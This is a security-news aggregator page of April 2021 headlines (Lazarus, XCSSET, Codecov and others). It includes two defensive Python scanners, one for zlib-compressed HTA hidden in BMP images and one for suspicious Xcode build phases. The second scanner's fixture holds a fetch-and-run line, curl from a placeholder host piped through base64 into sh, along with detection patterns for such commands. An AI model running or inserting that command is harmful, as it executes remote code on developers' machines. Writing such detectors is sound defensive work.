April 19, 2021 – APT
Lazarus APT Hackers are now using BMP images to hide RAT malware Full Text
Abstract
A spear-phishing attack operated by a North Korean threat actor targeting its southern counterpart has been found to conceal its malicious code within a bitmap (.BMP) image file to drop a remote access trojan (RAT) capable of stealing sensitive information. Attributing the attack to the Lazarus Group based on similarities to prior tactics adopted by the adversary, researchers from Malwarebytes said the phishing campaign started by distributing emails laced with a malicious document that it identified on April 13. "The actor has used a clever method to bypass security mechanisms in which it has embedded its malicious HTA file as a compressed zlib file within a PNG file that then has been decompressed during run time by converting itself to the BMP format," Malwarebytes researchers said . "The dropped payload was a loader that decoded and decrypted the second stage payload into memory. The second stage payload has the capability to receive and execute commandsThe Hacker News
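The Malwarebytes description above (a zlib-compressed HTA carried inside image data and inflated at run time) suggests a static check that does not depend on the dropper's own logic: look for zlib stream headers inside the image bytes and see whether any of them inflate to script markup. The Python below is an added example written for this page, not Malwarebytes' analysis code or anything from the Lazarus sample. The BMP, the harmless placeholder HTA embedded in it and the payload offset are all constructed here, and only the common 0x78 zlib CMF byte is searched for.

```python
import struct
import zlib

# Constructed, harmless stand-in for the HTA the write-up describes; not the real sample.
FAKE_HTA = (
    b'<html><head><hta:application id="x"/></head>'
    b'<script language="VBScript">MsgBox "placeholder"</script></html>'
)


def build_bmp(pixels: bytes, width: int = 16) -> bytes:
    """Wrap raw bytes in a minimal 24-bit BMP (14-byte file header + 40-byte DIB header)."""
    row = width * 3                                   # 48 bytes per row, a multiple of 4
    padded = pixels + b"\xff" * (-len(pixels) % row)  # pad the last row with white pixels
    height = len(padded) // row
    file_header = struct.pack("<2sIHHI", b"BM", 54 + len(padded), 0, 0, 54)
    dib_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                             len(padded), 2835, 2835, 0, 0)
    return file_header + dib_header + padded


FILLER = b"\xff" * 64                                  # innocent pixels around the stream
SUSPECT_BMP = build_bmp(FILLER + zlib.compress(FAKE_HTA) + FILLER)   # constructed sample
CLEAN_BMP = build_bmp(b"\xff" * 192)                   # constructed control image
PAYLOAD_OFFSET = 54 + len(FILLER)                      # where the zlib stream sits in SUSPECT_BMP


def find_embedded_zlib(data: bytes, min_size: int = 16) -> list[tuple[int, bytes]]:
    """Return (offset, inflated bytes) for every complete zlib stream found in data.

    Only the common CMF byte 0x78 (deflate, 32 KiB window) is searched for. A candidate
    must pass the zlib header check (CMF*256+FLG divisible by 31) and inflate to a
    complete stream with a valid trailer; that discards pixel noise that merely
    happens to start with 0x78.
    """
    hits = []
    i = data.find(b"\x78")
    while 0 <= i < len(data) - 1:
        cmf, flg = data[i], data[i + 1]
        if (cmf & 0x0F) == 8 and ((cmf << 8) | flg) % 31 == 0:
            inflater = zlib.decompressobj()
            try:
                out = inflater.decompress(data[i:])
                if inflater.eof and len(out) >= min_size:
                    hits.append((i, out))
            except zlib.error:
                pass
        i = data.find(b"\x78", i + 1)
    return hits


def looks_like_hta(payload: bytes) -> bool:
    """Content check for an inflated blob: HTA or script markup rather than image data."""
    low = payload.lower()
    return b"<script" in low or b"<hta:application" in low


if __name__ == "__main__":
    for name, blob in (("suspect.bmp", SUSPECT_BMP), ("clean.bmp", CLEAN_BMP)):
        hits = find_embedded_zlib(blob)
        print(f"{name}: {len(hits)} embedded zlib stream(s)")
        for offset, payload in hits:
            kind = "HTA-like" if looks_like_hta(payload) else "unknown"
            print(f"  offset {offset}: {len(payload)} bytes inflated, {kind}")
```

Requiring the stream to inflate to completion is what keeps this usable on real images: a 0x78 byte followed by a header-compatible byte appears every few kilobytes in ordinary pixel data, but such false candidates fail the deflate decode or the Adler-32 trailer long before they produce a plausible payload.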
April 19, 2021 – Ransomware
NitroRansomware Asks for $9.99 Discord Gift Codes, Steals Access Tokens Full Text
Abstract
The malware seems like a silly coding lark at first, but further exploration shows it can wreak serious damage in follow-on attacks.Threatpost
April 19, 2021 – Breach
Geico data breach exposed customers’ driver’s license numbers Full Text
Abstract
Car insurance provider Geico has suffered a data breach in which threat actors stole policyholders' driver's license numbers over a period of more than a month.BleepingComputer
April 19, 2021 – APT
Iron Tiger APT Group Roars Louder With New Toolkit Full Text
Abstract
Iron Tiger threat actor group was spotted using an upgraded toolkit in an 18-month old cyberespionage campaign against a gambling firm in the Philippines.Cyware Alerts - Hacker News
April 19, 2021 – Government
Hillicon Valley: Apple approves Parler’s return to App Store | White House scales back response to SolarWinds, Microsoft incidents | Pressure mounts on DHS over relationship with Clearview AI Full Text
Abstract
Apple told Republicans it will welcome an updated version of Parler back into its App Store with approved content moderation changes. Meanwhile, the Biden administration announced it is scaling back its initial response to both the SolarWinds and Microsoft Exchange Server hacking incidents, and the Department of Homeland Security is coming under pressure to discontinue its relationship with Clearview AI.The Hill
April 19, 2021 – Business
Cloudflare Announces First Canadian Office Full Text
Abstract
American tech company’s plan to open new office in Toronto is welcomed by city’s mayorInfosecurity Magazine
April 19, 2021 – Government
No Server Left Behind: The Justice Department’s Novel Law Enforcement Operation to Protect Victims Full Text
Abstract
The U.S. Department of Justice recently announced that it undertook a law enforcement operation to remove malware from hundreds of victim systems in the United States. What’s the significance of the move?Lawfare
April 19, 2021 – Hacker
Experts demonstrated how to hack a utility and take over a smart meter Full Text
Abstract
Researchers from FireEye's Mandiant team breached the network of a North American utility and turned off one of its smart meters. Over the years, the number of attacks against ICS/SCADA systems used by industrial organizations worldwide has rapidly...Security Affairs
April 19, 2021 – Government
White House closes SolarWinds, Microsoft Exchange focus groups, signaling return to normalcy Full Text
Abstract
The Biden administration’s handling of the two cyber incidents in coordination with industry leaves some in the community hopeful that a functioning interagency system will reemerge after years of atrophy.SCMagazine
April 19, 2021 – Malware
Google Alerts continues to be a hotbed of scams and malware Full Text
Abstract
Google Alerts continues to be a hotbed of scams and malware that threat actors are increasingly abusing to promote malicious websites.BleepingComputer
April 19, 2021 – Ransomware
ICS Computers Face Increased Ransomware Attacks - Kaspersky Report Full Text
Abstract
In a new report, Kaspersky noted that developed countries faced a large number of ransomware attacks on ICS systems during the pandemic owing to their consistency in keeping businesses up and running.Cyware Alerts - Hacker News
April 19, 2021 – Government
White House ‘standing down’ emergency response groups to SolarWinds, Microsoft hacks Full Text
Abstract
The Biden administration is “standing down” coordinated efforts by several key agencies to respond to recent major cybersecurity incidents including the SolarWinds hack, a senior administration official announced Monday.The Hill
April 19, 2021 – Business
Mastercard to Acquire Ekata Full Text
Abstract
Digital ID verification company to be acquired for $850mInfosecurity Magazine
April 19, 2021 – Criminals
Crooks made more than $560K with a simple clipboard hijacker Full Text
Abstract
Avast researchers analyzed the activity of a simple cryptocurrency malware dubbed HackBoss that allowed its operators to earn over $560K. While the value of major cryptocurrencies continues to increase, cybercriminals and malware authors focus their...Security Affairs
April 19, 2021 – Hacker
Chinese threat actors extract big data and sell it on the dark web Full Text
Abstract
The stolen data ranges from lottery and stock data to commercial databases of Canadian and U.S. businesses.SCMagazine
April 19, 2021 – Outage
Beverage Giant C&C Group Subsidiary Suffers IT Systems Outage Due to Security Incident Full Text
Abstract
Matthew Clark Bibendum (MCB), a distributor of alcoholic beverages and soft drinks in the UK and Ireland, says it’s working to restore IT systems following a cybersecurity incident.The Daily Swig
April 19, 2021 – Policy and Law
US Charges Nigerian with Elder Fraud Full Text
Abstract
Maryland resident accused of conning seniors out of nearly half a million dollars over social mediaInfosecurity Magazine
April 19, 2021 – Malware
XCSSET malware now targets macOS 11 and M1-based Macs Full Text
Abstract
XCSSET, a Mac malware targeting Xcode developers, has been re-engineered and employed in a campaign aimed at Apple's new M1 chips. Experts from Trend Micro have uncovered a Mac malware campaign targeting Xcode developers that employed a re-engineered...Security Affairs
April 19, 2021 – Botnet
Bad bot traffic reaching an all-time high over the past year Full Text
Abstract
There was a 372% increase in bad bot traffic on healthcare websites since September 2020. As vaccines became more widely available, bot activity was recorded at rates of 12,000 requests per hour.Help Net Security
April 19, 2021 – Ransomware
Ryuk Ransomware Anatomy of an Attack in 2021 Full Text
Abstract
Advintel observed actors conducting OSINT research related to the compromised host domain to identify the infected victim company and evaluate their revenue to assess what the ransom amount will be.Advanced Intelligence
April 19, 2021 – General
Payment transaction volume using 3-D Secure protocol grows globally Full Text
Abstract
RSA has published its latest quarterly fraud report, reinforcing the migration to more precise payment authentication methods and showing a notable spike in brand abuse attacks.Help Net Security
April 19, 2021 – Vulnerabilities
WordPress could treat Google FloC as a security issue Full Text
Abstract
The backlash against Google's Federated Learning of Cohorts (FLoC) has continued, with a proposal raised in WordPress Core to block the alternative identifier to third-party cookies by default.ZDNet
April 19, 2021 – Breach
Credit Card Data of Nearly 1 Million Domino’s Pizza India Customers Allegedly Sold Online Full Text
Abstract
A cybersecurity researcher claimed that the credit card details of nearly 1 million people who purchased online from Domino's Pizza India are allegedly being sold for around $550,000 on the dark web.The Times Of India
April 19, 2021 – General
Passwordless: More Mirage Than Reality Full Text
Abstract
The concept of "passwordless" authentication has been gaining significant industry and media attention. And for a good reason. Our digital lives are demanding an ever-increasing number of online accounts and services, with security best practices dictating that each requires a strong, unique password in order to ensure data stays safe. Who wouldn't want an easier way? That's the premise behind one-time passwords (OTP), biometrics, pin codes, and other authentication methods presented as passwordless security. Rather than remembering cumbersome passwords, users can authenticate themselves using something they own, know, or are. Some examples include a smartphone, OTP, hardware token, or biometric marker like a fingerprint. While this sounds appealing on the surface, the problem is that, when you dig deeper, these passwordless solutions are still reliant on passwords. This happens in two primary ways: Passwordless Solutions Rely on Passwords as a Fallback If you haThe Hacker News
April 19, 2021 – Business
Google Trumpets New Mobile App Security Standard Full Text
Abstract
Tech giant encourages developers to get on boardInfosecurity Magazine
April 19, 2021 – Business
OneTrust acquires Convercent to bring ethics and compliance technology into a single platform Full Text
Abstract
The acquisition of the ethics and compliance platform brings together privacy, data governance, GRC, third-party risk, ESG and ethics and compliance together into a single operational workflow.Help Net Security
April 19, 2021 – Malware
Malware That Spreads Via Xcode Projects Now Targeting Apple’s M1-based Macs Full Text
Abstract
A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps. XCSSET came into the spotlight in August 2020 after it was found to spread via modified Xcode IDE projects which, when built, were configured to execute the payload. The malware repackages payload modules to imitate legitimate Mac apps, which are ultimately responsible for infecting local Xcode projects and injecting the main payload to execute when the compromised project builds. XCSSET modules come with the capabilities to steal credentials, capture screenshots, inject malicious JavaScript into websites, plunder user data from different apps, and even encrypt files for a ransom. Then in March 2021, Kaspersky researchers uncovered XCSSET samples compiled for the new Apple M1 chips, suggesting that the malware campaign was not only ongoing but also that adversaries are activThe Hacker News
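XCSSET's infection of local Xcode projects works because a project.pbxproj can carry a PBXShellScriptBuildPhase whose shellScript runs every time the project is built, so a developer who pulls a tampered project and hits Build runs the dropper. The Python below is an added example written for this page, not Trend Micro's, Kaspersky's or XCSSET's code: it extracts every run-script phase from a constructed project.pbxproj excerpt and flags the behaviours a build-time dropper needs (fetching over the network, base64-decoding, piping into a shell, evaluating generated code, stripping the quarantine flag). The object IDs, phase names and the example.invalid URL are made up, and the indicator list is an assumption about what to look for, not XCSSET's actual script.

```python
import re

# Constructed project.pbxproj excerpt (not taken from a real sample): one ordinary lint
# phase and one build-time fetch-and-run phase of the kind the write-up describes.
SAMPLE_PBXPROJ = r"""
/* Begin PBXShellScriptBuildPhase section */
        0123456789ABCDEF01234567 /* Run SwiftLint */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "\"${SRCROOT}/scripts/lint.sh\"\n";
        };
        89ABCDEF0123456789ABCDEF /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
            shellPath = /bin/sh;
            shellScript = "curl -fsSL https://example.invalid/stage1 | base64 -d | sh\necho done\n";
        };
/* End PBXShellScriptBuildPhase section */
"""

# One object of the text plist: 24-hex-digit id, comment, "= {", the isa line first
# (Xcode writes keys in alphabetical order) and a closing "};" on its own line.
PHASE_RE = re.compile(
    r"(?P<id>[0-9A-F]{24}) /\* (?P<name>[^*]*) \*/ = \{\s*"
    r"isa = PBXShellScriptBuildPhase;(?P<body>.*?)\n\s*\};",
    re.S,
)
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')
PATH_RE = re.compile(r"shellPath = ([^;]+);")

# Behaviours a build-time dropper needs; an assumed list, not XCSSET's actual script.
INDICATORS = [
    ("remote download", re.compile(r"\b(curl|wget)\b")),
    ("base64 decode", re.compile(r"\bbase64\s+(-d|-D|--decode)\b")),
    ("eval of generated code", re.compile(r"\beval\b")),
    ("inline interpreter", re.compile(r"\b(python3?|perl|ruby|osascript)\s+-[ce]\b")),
    ("quarantine flag removal", re.compile(r"xattr\s+-\w*d\w*\s+com\.apple\.quarantine")),
    ("pipe to shell", re.compile(r"\|\s*(ba|z)?sh\b")),
]

_ESCAPES = {"n": "\n", "t": "\t"}


def unescape(s: str) -> str:
    """Undo pbxproj string escaping (backslash-n, backslash-t, escaped quote and backslash)."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), s, flags=re.S)


def scan_pbxproj(text: str) -> list[dict]:
    """Return every run-script build phase together with the indicators its script matches."""
    phases = []
    for m in PHASE_RE.finditer(text):
        body = m.group("body")
        script_m = SCRIPT_RE.search(body)
        path_m = PATH_RE.search(body)
        script = unescape(script_m.group(1)) if script_m else ""
        phases.append({
            "id": m.group("id"),
            "name": m.group("name"),
            "shell": path_m.group(1).strip() if path_m else "",
            "script": script,
            "indicators": [label for label, rx in INDICATORS if rx.search(script)],
        })
    return phases


def suspicious_phases(text: str) -> list[dict]:
    """Only the phases that matched at least one indicator."""
    return [p for p in scan_pbxproj(text) if p["indicators"]]


if __name__ == "__main__":
    for phase in scan_pbxproj(SAMPLE_PBXPROJ):
        verdict = ", ".join(phase["indicators"]) or "no indicators"
        print(f'{phase["id"]} "{phase["name"]}" ({phase["shell"]}): {verdict}')
        for line in phase["script"].rstrip("\n").splitlines():
            print(f"    {line}")
```

Run it against `project.pbxproj` inside every `.xcodeproj` in a checkout before building; a phase that passes this screen can still be hostile (the script may simply call a file the repository also carries), so the real control is reviewing every run-script phase a pull request adds, not the indicator list.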
April 19, 2021 – Policy and Law
FIN7 Sysadmin Gets 10 Years Behind Bars Full Text
Abstract
Carbanak manager was recruited via Combi Security front companyInfosecurity Magazine
April 19, 2021 – Government
U.S. Takes Aim at Russia’s Cyber Ops Ecosystem Full Text
Abstract
Russian tech companies identified and sanctioned by the US Treasury Department include ERA Technopolis, Pasit AO, SVA, Neobit OOO, Advanced System Technology, and Pozitiv Teknolodzhiz.Security Boulevard
April 19, 2021 – General
Growing reliance on third-party suppliers signals increasing security risks Full Text
Abstract
Adversaries are turning their focus on cheaper, easier targets within an organization's supply chain, especially as businesses increasingly acquire software from external suppliers.ZDNet
April 19, 2021 – Criminals
Cybercriminals Claim to Sell 50GB of Data Exfiltrated from OTP-Generating Company Full Text
Abstract
Apart from OTP codes, other data included in the sale involved personally identifiable information (PII) such as SMS logs, mobile numbers, email addresses, SMPP details, customer documents, and more.Hackread
April 19, 2021 – Ransomware
Ransomware micro-criminals are still out here (and growing) Full Text
Abstract
The conventional ransomware operation model is still very active: victims keep receiving e-mails with malicious attachments that automatically execute the ransomware payload on the unlucky machine.Yoroi
April 19, 2021 – Breach
Major data breach at cleaning and catering company Spotless Full Text
Abstract
The potentially exposed data could have included the names, email addresses, phone numbers, and residential addresses as well as passport details and tax numbers of current and former employees.Stuff NZ
April 19, 2021 – Business
PlexTrac Raises $10 Million for Its Purple Teaming Platform Full Text
Abstract
PlexTrac last week announced closing a $10 million Series A funding round led by Noro-Moseley Partners and Madrona Venture Group, with participation from StageDotO Ventures.Security Week
April 19, 2021 – Phishing
Shady scam bots trick Omegle users into nonconsensual video sex recordings Full Text
Abstract
One way for scammers to make their bots more believable is by recording unknowing Omegle users doing things the scammer wants them to do and then using those recordings to target more users.Malwarebytes Labs
April 19, 2021 – Policy and Law
ICO Issued Over £42 Million in Fines Last Year Full Text
Abstract
Question marks remain over regulator’s ability to collectInfosecurity Magazine
April 19, 2021 – Malware
Nitroransomware demands gift codes as ransom payments Full Text
Abstract
A new ransomware dubbed 'NitroRansomware' has appeared in the threat landscape; it demands a Discord Nitro gift code to decrypt files. Researchers from BleepingComputer reported infections of a new, unusual ransomware dubbed NitroRansomware which...Security Affairs
April 19, 2021 – Malware
WhatsApp Pink is malware spreading through group chats Full Text
Abstract
An unusual baiting technique has appeared in which WhatsApp users receive links, disguised as an official update, that claim to change the application's theme from its trademark green to pink.Hackread
April 19, 2021 – Breach
Codecov was a victim of a supply chain attack Full Text
Abstract
The software company Codecov suffered a security breach, threat actors compromised the supply chain of one of its tools. A new supply chain attack made the headlines, the software company Codecov recently disclosed a major security breach after a threat...Security Affairs
April 19, 2021 – Ransomware
Not just ransomware: Schools and universities are increasingly targeted by impersonation scams Full Text
Abstract
School districts and universities, which were once seen as poor targets for financially motivated cybercrime attacks, are now awash in impersonation scams and other attacks.The Record
April 19, 2021 – Solution
Infection Monkey: Open source tool allows zero trust assessment of AWS environments Full Text
Abstract
Using this tool, security professionals can conduct zero trust assessments of AWS environments to help identify the potential gaps in an organization’s AWS security posture that can put data at risk.Help Net Security
April 19, 2021 – IOT
The parallels of pandemic response and IoT security Full Text
Abstract
Because complete isolation is not practical for most networks, network segments, and devices, perimeter controls are needed to limit who and what can get inside the network.Help Net Security
April 19, 2021 – Vulnerabilities
Google Project Zero testing 30-day grace period on bug details to boost user patching Full Text
Abstract
Google Project Zero will be shifting from a 90-day deadline to a new model that incorporates a 30-day grace period to give users time to install patches before technical details are revealed.ZDNet
April 18, 2021 – Vulnerabilities
WordPress to automatically disable Google FLoC on websites Full Text
Abstract
WordPress announced today that they plan on treating Google's new FLoC tracking technology as a security concern and plans to block it by default on WordPress sites.BleepingComputer
April 18, 2021 – Malware
Saint Bot Downloader - A New Cyberthreat in Making Full Text
Abstract
A previously undocumented malware downloader has been spotted in the wild leveraging phishing attacks to deploy credential stealers and other malicious payloads.Cyware Alerts - Hacker News
April 18, 2021 – Vulnerabilities
Monero Cryptocurrency campaign exploits ProxyLogon flaws Full Text
Abstract
Threat actors are exploiting the ProxyLogon vulnerabilities in Microsoft Exchange servers to deploy Monero cryptocurrency miners. Sophos researchers reported that threat actors targeted Microsoft Exchange by exploiting ProxyLogon vulnerabilities...Security Affairs
April 18, 2021 – Ransomware
Discord Nitro gift codes now demanded as ransomware payments Full Text
Abstract
In a novel approach to ransom demands, a new ransomware calling itself 'NitroRansomware' encrypts victim's files and then demands a Discord Nitro gift code to decrypt files.BleepingComputer
April 18, 2021 – Government
Nation-State Attackers Taking Over Global Cyber Realm Full Text
Abstract
New research sheds light on cyberattack incidents by nation-state-backed groups, revealing a 100% rise in nation-state incidents between 2017 and 2020.Cyware Alerts - Hacker News
April 18, 2021 – Policy and Law
A member of the FIN7 group was sentenced to 10 years in prison Full Text
Abstract
Fedir Hladyr (35), a Ukrainian national was sentenced today to 10 years in prison for his role in the financially motivated group FIN7, aka Carbanak. The Ukrainian national Fedir Hladyr (35), aka “das” or “AronaXus,” was sentenced to 10 years...Security Affairs
April 18, 2021 – Policy and Law
US sanctions cryptocurrency addresses linked to Russian cyberactivities Full Text
Abstract
The US government this week sanctioned 28 cryptocurrency addresses allegedly associated with entities or individuals linked to Russian cyberattacks or election interference.BleepingComputer
April 18, 2021 – Breach
U.S. Investigators Are Reportedly Looking Into Codecov Breach Full Text
Abstract
U.S. federal investigators are purportedly looking into a security breach at Codecov, a platform used to test software code with more than 29,000 customers worldwide, Reuters reported on Saturday.Gizmodo
April 18, 2021 – General
Security Affairs newsletter Round 310 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. Is the recent accident at Iran Natanz nuclear plant a cyber attack? | Joker malware infected 538,000...Security Affairs
April 18, 2021 – Malware
Is BazarLoader malware linked to Trickbot operators? Full Text
Abstract
Experts warn of malware campaigns delivering the BazarLoader malware abusing popular collaboration tools like Slack and BaseCamp. Since January, researchers observed malware campaigns delivering the BazarLoader malware abusing popular collaboration...Security Affairs
April 17, 2021 – Vulnerabilities
Microsoft fixes Windows 10 bug that can corrupt NTFS drives Full Text
Abstract
Microsoft has fixed a bug that could allow a threat actor to create specially crafted downloads that crash Windows 10 simply by opening the folder where they are downloaded.BleepingComputer
April 17, 2021 – Vulnerabilities
Google Project Zero updates vulnerability disclosure policy moving to a “90+30” model Full Text
Abstract
Google Project Zero security team has updated its vulnerability disclosure policy, it gives users 30 days to patch flaws before disclosing associated technical details. The Google Project Zero security team announced an update to its vulnerability...Security Affairs
April 17, 2021 – Ransomware
Ryuk ransomware operation updates hacking techniques Full Text
Abstract
Recent attacks from Ryuk ransomware operators show that the actors have a new preference when it comes to gaining initial access to the victim network.BleepingComputer
April 17, 2021 – Government
6 out of 11 EU Agencies Running SolarWinds Orion Software Were Hacked Full Text
Abstract
European Commissioner for Budget and Administration Johannes Hahn confirmed the hack of some EU agencies as result of the SolarWinds supply chain attack in a response to a question filed by an EU Parliament member.Security Affairs
April 17, 2021 – Policy and Law
SysAdmin of Billion-Dollar Hacking Group Gets 10-Year Sentence Full Text
Abstract
A high-level manager and systems administrator associated with the FIN7 threat actor has been sentenced to 10 years in prison, the U.S. Department of Justice announced Friday. Fedir Hladyr , a 35-year-old Ukrainian national, is said to have played a crucial role in a criminal scheme that compromised tens of millions of debit and credit cards, in addition to aggregating the stolen information, supervising other members of the group, and maintaining the server infrastructure that FIN7 used to attack and control victims' machines. The development comes after Hladyr pleaded guilty to conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking in September 2019. He was arrested in Dresden, Germany, in 2018 and extradited to the U.S. city of Seattle. Hladyr has also been ordered to pay $2.5 million in restitution. "This criminal organization had more than 70 people organized into business units and teams. Some were hackers, others developed the malwaThe Hacker News
April 17, 2021 – Government
6 out of 11 EU agencies running Solarwinds Orion software were hacked Full Text
Abstract
The SolarWinds supply chain attack also impacted six European Union institutions, the European Commissioner for Budget and Administration confirmed. European Commissioner for Budget and Administration Johannes Hahn confirmed the hack of some EU agencies as a result...Security Affairs
April 17, 2021 – Outage
Major BGP leak disrupts thousands of networks globally Full Text
Abstract
A large BGP routing leak that occurred last night disrupted the connectivity for thousands of major networks and websites around the world. Although the BGP routing leak occurred in Vodafone's autonomous network (AS55410) based in India, it has impacted U.S. companies, including Google, according to sources.BleepingComputer
April 17, 2021 – Government
‘Simple Photoshop’: how a Pakistani counterfeiter may have aided Russian trolls Full Text
Abstract
Amid the cascade of U.S. sanctions imposed on Russian cybersecurity companies and officials alleged to be operating on behalf of the Kremlin’s intelligence services, one company stood out: the Fresh Air Farm House in Karachi, Pakistan.Reuters
April 17, 2021 – Education
What are the different roles within cybersecurity? Full Text
Abstract
People talk about the cybersecurity job market like it's a monolith, but there are a number of different roles within cybersecurity, depending not only on your skill level and experience but on what you like to do. In fact, Cybercrime Magazine came up with a list of 50 cybersecurity job titles, while CyberSN, a recruiting organization, came up with its own list of 45 cybersecurity job categories. Similarly, OnGig.com, a company that helps firms write their job ads, analyzed 150 cybersecurity job titles and came up with its own top 30 list. This article is based on research I did with Springboard, one of the first cybersecurity bootcamps with a job guarantee and 1:1 mentorship. In particular, CyberSeek.org, a joint industry initiative looking at the cybersecurity job market, offers an interactive list of not only the various positions within cybersecurity but offers you a career path showing how you can get promoted. The complicated part is that these titles and rolesThe Hacker News
April 17, 2021 – Policy and Law
High-Level Admin of FIN7 Cybercrime Group Sentenced to 10 Years in Prison Full Text
Abstract
A high-level manager of cybercrime group FIN7, also known as the Carbanak Group and the Navigator Group, has been sentenced to ten years in prison, the Department of Justice reports.Dark Reading
April 17, 2021 – Vulnerabilities
Critical RCE can allow attackers to compromise Juniper Networks devices Full Text
Abstract
Juniper Networks addressed a critical vulnerability in Junos OS, tracked as CVE-2021-0254, that could allow an attacker to remotely hijack or disrupt affected devices. This flaw stems from the improper buffer size validation, which cSecurity Affairs
April 16, 2021 – Ransomware
The Week in Ransomware - April 16th 2021 - The Houston Rockets Full Text
Abstract
It has been a pretty quiet week with only a few large attacks disclosed and only a few new ransomware variants released. The highest-profile attack this week is the NBA's Houston Rockets who were transparent about their ransomware attack.BleepingComputer
April 16, 2021 – Malware
Is IcedID Banking Trojan on the Way to Becoming the Next Emotet? Full Text
Abstract
Security analysts observe a similarity between IcedID and Emotet campaigns, noting that while the takedown effort against the latter was under way, the former was surging.Cyware Alerts - Hacker News
April 16, 2021 – General
Hillicon Valley: Facebook Oversight board to rule on Trump ban in ‘coming weeks’ | Russia blocks Biden Cabinet officials in retaliation for sanctions Full Text
Abstract
The Hill
April 16, 2021 – Privacy
US Indicts SecondEye Operators Full Text
Abstract
Two charged over sale of thousands of false identity documents on dark net.Infosecurity Magazine
April 16, 2021 – Vulnerabilities
Critical RCE can allow attackers to compromise Juniper Networks devices Full Text
Abstract
Cybersecurity provider Juniper Networks addressed a critical vulnerability that could be exploited by attackers to remotely hijack or disrupt vulnerable devices. Cybersecurity vendor Juniper Networks addressed a critical vulnerability in Junos OS, tracked...Security Affairs
April 16, 2021 – Breach
Will the CodeCov breach become the next big software supply chain hack? Full Text
Abstract
Knowing the identity of the group behind the attack would help shed light on their possible goals, but several observers said the length of time the attackers spent in Codecov’s network and the focus on credentials indicate that they were more interested in getting access to customers’ code than the company itself.SCMagazine
April 16, 2021 – Malware
BazarLoader Malware Abuses Slack, BaseCamp Clouds Full Text
Abstract
Two cyberattack campaigns are making the rounds using unique social-engineering techniques.Threatpost
April 16, 2021 – Vulnerabilities
Popular Codecov code coverage tool hacked to steal dev credentials Full Text
Abstract
Codecov online platform for hosted code testing reports and statistics announced on Thursday that a threat actor had modified its Bash Uploader script, exposing sensitive information in customers' continuous integration (CI) environment.BleepingComputer
April 16, 2021 – Ransomware
The Rise and Fall of Maze Cartel Full Text
Abstract
From being a lone warrior to becoming an influencer, the Maze group has carved its way to becoming one of the most infamous ransomware groups by establishing the first-ever cartel.Cyware Alerts - Hacker News
April 16, 2021 – Government
US Issues Russian SVR Warning Full Text
Abstract
America urges organizations to patch five vulnerabilities being exploited by Russia's Foreign Intelligence Service.Infosecurity Magazine
April 16, 2021 – APT
Russia-linked APT SVR actively targets these 5 flaws Full Text
Abstract
The US government warned that Russian cyber espionage group SVR is exploiting five known vulnerabilities in enterprise infrastructure products. The U.S. National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal...Security Affairs
April 16, 2021 – Vulnerabilities
Google won’t reveal technical details on patches for 30 days if vendors hit deadlines Full Text
Abstract
Researchers applauded the move, which Google’s Project Zero hopes will drive user patch adoption.SCMagazine
April 16, 2021 – Ransomware
How the Kremlin provides a safe harbor for ransomware Full Text
Abstract
A global epidemic of digital extortion known as ransomware is crippling local governments, hospitals, school districts, and businesses by scrambling their data files until they pay up. Law enforcement has been largely powerless to stop it.NBC News
April 16, 2021 – Business
Keyfactor to Merge with PrimeKey Full Text
Abstract
Deal marks first ever merger between certificate automation and certificate authority providers.Infosecurity Magazine
April 16, 2021 – Business
Cyber nonprofits ask billionaire philanthropists to show them some love Full Text
Abstract
Cyber organizations are seeking funding from what they describe as the “entrepreneurs who made vast fortunes creating the very technologies that give rise to threats.”SCMagazine
April 16, 2021 – Covid-19
44 Organizations Targeted in Attacks Aimed at COVID-19 Vaccine Cold Chain Full Text
Abstract
More than 40 organizations have been targeted in a global campaign focused on the COVID-19 vaccine cold chain infrastructure, which handles the distribution of vaccines and their storage.Security Week
April 16, 2021 – Vulnerabilities
Mass Monitoring of Remote Workers Drives Shadow IT Risk Full Text
Abstract
Kaspersky study finds employees switching to less secure personal devices.Infosecurity Magazine
April 16, 2021 – Business
The Biggest Cybersecurity Funding Rounds in 2020 Full Text
Abstract
The lifeblood of the cybersecurity industry is new investments, both in startups and established companies. 272 vendors received additional funding in 2020 based on data published by Crunchbase. The total new investment for 2020 was $10.7 billion.Thansyn
April 16, 2021 – Vulnerabilities
Critical Vulnerability Can Allow Attackers to Hijack or Disrupt Juniper Devices Full Text
Abstract
A critical vulnerability patched recently by networking and cybersecurity solutions provider Juniper Networks could allow an attacker to remotely hijack or disrupt affected devices.Security Week
April 16, 2021 – Criminals
Cybercriminals Hacked into Codecov’s Bash Uploader Tool and Stole Customer Credentials for 2.5 Months Full Text
Abstract
Codecov said the breach occurred “because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.”The Record
April 16, 2021 – Vulnerabilities
Cockpit CMS flaws exposed web servers to NoSQL injection exploits Full Text
Abstract
The vulnerabilities could allow a remote, unauthenticated attacker to execute code on a server running Cockpit in some configurations, specifically limited to those running MongoLite.The Daily Swig
April 16, 2021 – Breach
Over 5,000 Individuals Affected in Security Breach at Melbourne-based Swinburne University Full Text
Abstract
Swinburne University said that the leaked data, including personal information on staff, students, and external parties, was event registration information from multiple events from 2013 onwards.ZDNet
April 16, 2021 – General
2021 and Emerging Cybersecurity Threats Full Text
Abstract
Instead of coming to a standstill, if anything, 2020 saw an increase in cybersecurity threats as criminals found new ways to take advantage of vulnerabilities and infiltrate business systems.Hackread
April 16, 2021 – Policy and Law
Bank Groups Object to Proposed Breach Notification Regulation Full Text
Abstract
The American Bankers Association and three other groups have voiced objections to provisions in a cyber incident notification regulation for banks proposed by three federal agencies.Gov Info Security
April 16, 2021 – Vulnerabilities
Google to Delay Publishing Bug Details for 30 Days Full Text
Abstract
New strategy designed to mitigate opportunistic attacks.Infosecurity Magazine
April 16, 2021 – Malware
